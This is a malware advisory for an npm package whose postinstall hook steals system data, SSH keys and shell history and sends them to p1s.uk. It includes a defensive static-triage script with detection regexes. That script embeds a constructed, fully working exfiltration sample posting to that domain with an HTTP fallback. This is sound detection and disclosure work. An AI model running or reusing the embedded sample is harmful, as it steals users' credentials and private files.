Note: This report is updated by a verification record
The package is malware. Its install script exfiltrates system information to a hardcoded domain, collects sensitive data, and executes suspicious commands.
The package is marked as malware by OSV: MAL-2026-2615 (source: ghsa-malware).
The package contains a postinstall.js script, which npm runs automatically on install, that exhibits multiple malicious behaviors. It collects user, system, disk, and network information (Evidence 0), gathers system information and exfiltrates it to the hardcoded domain p1s.uk (Evidence 1, 10), collects sensitive environment variables (Evidence 11), reads sensitive files such as SSH keys and shell history (Evidence 4, 5, 6, 7, 8, 12), and executes potentially dangerous commands (Evidence 13). If the HTTPS request fails, the script falls back to plain HTTP (Evidence 14), so the collected data may leave the host unencrypted. These behaviors, together with YARA rule matches for system information exfiltration, SSH key access, and command execution, strongly indicate that the package is malicious.
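The script below is an added triage example and is not code from this report, from the scanner that produced it, or from the package itself. It shows how a reviewer can statically flag the behavior pattern described above in an npm package before installing it: find install-time lifecycle hooks in package.json, scan the script they invoke for system-information collection, environment dumps, SSH key and shell-history reads, command execution, hardcoded exfiltration hosts, and an https-plus-http combination that suggests a plaintext fallback. The function names (triagePackage, scanScript, findInstallHooks), the weights, and the thresholds are illustrative choices; the two sample packages are constructed for the example (the malicious one mimics the behaviors listed in the report and only reuses the domain p1s.uk from it) and are never executed, only scanned as text.

```javascript
// Added example: static triage of npm install hooks. Not the report's or the package's code.
// Each indicator is a regex over the script text; matches are counted, never run.
const INDICATORS = [
  { id: 'sysinfo', weight: 1, why: 'collects user/host/network info',
    re: /\bos\.(userInfo|hostname|networkInterfaces|cpus|totalmem|platform|release)\s*\(/g },
  { id: 'env',     weight: 2, why: 'reads the whole process environment',
    re: /\bprocess\.env\b(?!\.(NODE_ENV|npm_))/g },
  { id: 'ssh',     weight: 3, why: 'touches SSH keys or known_hosts',
    re: /\.ssh\b|\bid_(rsa|ed25519|ecdsa|dsa)\b|known_hosts/g },
  { id: 'history', weight: 2, why: 'reads shell history',
    re: /\.(bash|zsh)_history|\.history\b/g },
  { id: 'exec',    weight: 2, why: 'executes commands',
    re: /\b(execSync|execFileSync|spawnSync|exec|spawn)\s*\(/g },
  { id: 'net',     weight: 2, why: 'loads an HTTP client',
    re: /\brequire\(\s*['"]https?['"]\s*\)/g },
];
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Scan one script's source text and return findings, hardcoded hosts, and a verdict.
function scanScript(source) {
  const findings = [];
  for (const ind of INDICATORS) {
    const count = (source.match(ind.re) || []).length;
    if (count > 0) findings.push({ id: ind.id, why: ind.why, count, weight: ind.weight });
  }
  const hosts = new Set();
  for (const m of source.matchAll(/hostname\s*:\s*['"]([A-Za-z0-9.-]+)['"]/g)) hosts.add(m[1]);
  for (const m of source.matchAll(/https?:\/\/([A-Za-z0-9.-]+)/g)) hosts.add(m[1]);
  // Requiring both https and http in an install script is the shape of an
  // "encrypted first, plaintext if that fails" exfiltration path.
  const usesHttps = /require\(\s*['"]https['"]\s*\)/.test(source);
  const usesHttp = /require\(\s*['"]http['"]\s*\)/.test(source);
  const plaintextFallback = usesHttps && usesHttp;
  const score = findings.reduce((s, f) => s + f.weight, 0) + (plaintextFallback ? 1 : 0);
  const has = (id) => findings.some((f) => f.id === id);
  const exfil = has('net') && hosts.size > 0;
  const sensitive = has('ssh') || has('history') || has('env');
  const verdict = exfil && sensitive ? 'malicious' : score >= 4 ? 'suspicious' : 'clean';
  return { findings, hosts: [...hosts].sort(), plaintextFallback, score, verdict };
}

// List the install-time hooks declared in package.json.
function findInstallHooks(pkgJsonText) {
  const scripts = JSON.parse(pkgJsonText).scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => h in scripts).map((h) => ({ hook: h, command: scripts[h] }));
}

// files maps a path inside the package to its source text.
function triagePackage(pkgJsonText, files) {
  const rank = { clean: 0, suspicious: 1, malicious: 2 };
  const report = { hooks: findInstallHooks(pkgJsonText), scripts: [], verdict: 'clean' };
  for (const { hook, command } of report.hooks) {
    // Only "node <file>" hooks are scanned; anything else (curl | sh, node -e ...)
    // is still listed under hooks and left for manual review.
    const m = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/.exec(command);
    const source = m && files[m[1]];
    if (!source) continue;
    const scan = { hook, file: m[1], ...scanScript(source) };
    report.scripts.push(scan);
    if (rank[scan.verdict] > rank[report.verdict]) report.verdict = scan.verdict;
  }
  return report;
}

// Constructed sample package: mimics the behaviors in the report; it is scanned, not run.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'example-pkg', version: '1.0.0', scripts: { postinstall: 'node postinstall.js' },
});
const SAMPLE_POSTINSTALL = [
  "const os = require('os'), fs = require('fs'), path = require('path');",
  "const https = require('https'), http = require('http');",
  "const { execSync } = require('child_process');",
  "const home = os.homedir();",
  "const read = p => { try { return fs.readFileSync(p, 'utf8'); } catch (e) { return null; } };",
  "const info = { user: os.userInfo(), host: os.hostname(), net: os.networkInterfaces(),",
  "  env: process.env, key: read(path.join(home, '.ssh', 'id_rsa')),",
  "  hist: read(path.join(home, '.bash_history')), disks: execSync('df -h').toString() };",
  "function send(mod) {",
  "  const req = mod.request({ hostname: 'p1s.uk', path: '/c', method: 'POST' });",
  "  req.on('error', () => { if (mod === https) send(http); });",
  "  req.end(JSON.stringify(info));",
  "}",
  "send(https);",
].join('\n');
// Constructed benign control: a postinstall hook that only prints a message.
const BENIGN_POSTINSTALL = "console.log('Thanks for installing example-pkg');";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triagePackage(SAMPLE_PACKAGE_JSON, { 'postinstall.js': SAMPLE_POSTINSTALL }), null, 2));
}
```

On the constructed sample this reports a postinstall hook, all six indicators, the hardcoded host p1s.uk, a plaintext fallback, and the verdict "malicious"; the benign control keeps its hook but scores zero and stays "clean". Regex triage of this kind is a first pass only: a minified or string-encoded script will evade it, so a hit is a reason to inspect the package, and a miss is not a clearance.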